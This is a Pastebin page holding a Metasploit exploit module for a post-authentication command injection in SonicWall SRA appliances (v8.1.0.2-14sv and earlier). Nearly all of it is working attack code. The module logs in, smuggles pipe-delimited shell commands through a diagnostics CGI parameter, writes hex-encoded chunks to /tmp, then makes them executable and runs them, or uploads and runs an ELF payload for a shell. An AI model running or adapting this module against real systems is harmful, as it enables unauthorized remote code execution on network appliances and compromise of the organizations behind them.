Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Sonicwall extensionsettings script name Remote Command Injection Vulnerablity
- # Date: 12/25/2016
- # Exploit Author: xort @ Critical Start
- # Vendor Homepage: www.sonicwall.com
- # Software Link: sonicwall.com/products/sra-virtual-appliance
- # Version: 8.1.0.2-14sv
- # Tested on: 8.1.0.2-14sv
- #
- # CVE : (awaiting cve)
- # vuln: extensionsettings.cgi / script file (filename) parameter /
- # Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
- #
- # xort @ Critical Start
- require 'msf/core'
- class MetasploitModule < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Exploit::Remote::Tcp
- include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
- 'Description' => %q{
- This module exploits a remote command execution vulnerability in
- the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
- a section of the machine's administrative interface for performing configurations
- related to on-connect scripts to be launched for users' connecting.
- },
- 'Author' =>
- [
- 'xort@Critical Start', # vuln + metasploit module
- ],
- 'Version' => '$Revision: 1 $',
- 'References' =>
- [
- [ 'none', 'none'],
- ],
- 'Platform' => [ 'linux'],
- 'Privileged' => true,
- 'Arch' => [ ARCH_X86 ],
- 'SessionTypes' => [ 'shell' ],
- 'Privileged' => false,
- 'Payload' =>
- {
- 'Compat' =>
- {
- 'ConnectionType' => 'find',
- }
- },
- 'Targets' =>
- [
- ['Linux Universal',
- {
- 'Arch' => ARCH_X86,
- 'Platform' => 'linux'
- }
- ],
- ],
- 'DefaultTarget' => 0))
- register_options(
- [
- OptString.new('PASSWORD', [ false, 'Device password', "" ]),
- OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
- OptString.new('CMD', [ false, 'Command to execute', "" ]),
- Opt::RPORT(443),
- ], self.class)
- end
- def do_login(username, password_clear)
- vprint_status( "Logging into machine with credentials...\n" )
- # vars
- timeout = 1550;
- style_key = Rex::Text.rand_text_hex(32)
- # send request
- res = send_request_cgi(
- {
- 'method' => 'POST',
- 'uri' => "/cgi-bin/userLogin",
- 'headers' => {
- 'Connection' => 'close',
- 'Content-Type' => 'application/x-www-form-urlencoded',
- 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
- },
- 'vars_post' => {
- 'username' => username,
- 'password' => password_clear,
- 'domain' => 'LocalDomain',
- 'loginButton' => 'Login',
- 'state' => 'login',
- 'login' => 'true',
- 'VerifyCert' => '0',
- 'portalname' => 'VirtualOffice',
- 'ajax' => 'true'
- },
- }, timeout)
- swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
- return swap
- end
- def run_command_spliced(username, swap_cookie, cmd)
- vprint_status( "Running Command...\n" )
- # send request with payload
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "/cgi-bin/diagnostics",
- 'vars_get' => {
- 'tsrEmailCurrent' => 'true',
- 'currentTSREmailTo' => '|'+cmd+'|x',
- },
- 'headers' => {
- 'Cookie' => 'swap='+swap_cookie+';',
- 'Content-Type' => 'text/plain; charset="iso-8859-1"',
- 'Connection' => 'close',
- },
- }, 30 )
- end
- def run_command(username, swap_cookie, cmd)
- write_mode = ">"
- dump_file = "/tmp/qq"
- # base64 - encode with base64 so we can send special chars and multiple lines
- #cmd_encoded = Base64.strict_encode64(cmd)
- cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
- vprint_status("cmd_encoded = #{cmd_encoded}")
- for cmd_chunk in cmd_encoded.split(/(....................................................................................................)/)
- cmd_new = "printf%20\"#{cmd_chunk}\"#{write_mode}#{dump_file}"
- #cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}".gsub("+", "_")
- # set to normal append for loops after the first round
- if write_mode == ">"
- write_mode = ">>"
- end
- # add cmd to array to be exected later
- run_command_spliced(username, swap_cookie, cmd_new)
- end
- # execute payload stored at dump_file
- run_command_spliced(username, swap_cookie, "chmod%20777%20/tmp/qq;sh%20/tmp/qq")
- end
- def exploit
- # timeout
- timeout = 1550;
- # params
- password_clear = datastore['PASSWORD']
- user = datastore['USERNAME']
- # do authentication
- swap_cookie = do_login(user, password_clear)
- vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
- #if no 'CMD' string - add code for root shell
- if not datastore['CMD'].nil? and not datastore['CMD'].empty?
- cmd = datastore['CMD']
- # Encode cmd payload
- encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
- vprint_status("encoded_cmd = #{encoded_cmd}")
- # kill stale calls to bdump from previous exploit calls for re-use
- run_command(user, swap_cookie, ("sudo /bin/rm -f /tmp/n;printf \"#{encoded_cmd}\">/tmp/n;chmod +rx /tmp/n;/tmp/n" ))
- else
- # Encode payload to ELF file for deployment
- elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
- encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
- vprint_status("encoded_elf = #{encoded_elf}")
- # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
- run_command(user, swap_cookie, ("echo -e \"#{encoded_elf}\"\>/tmp/m\;chmod +rx /tmp/m\;/tmp/m"))
- # wait for magic
- handler
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement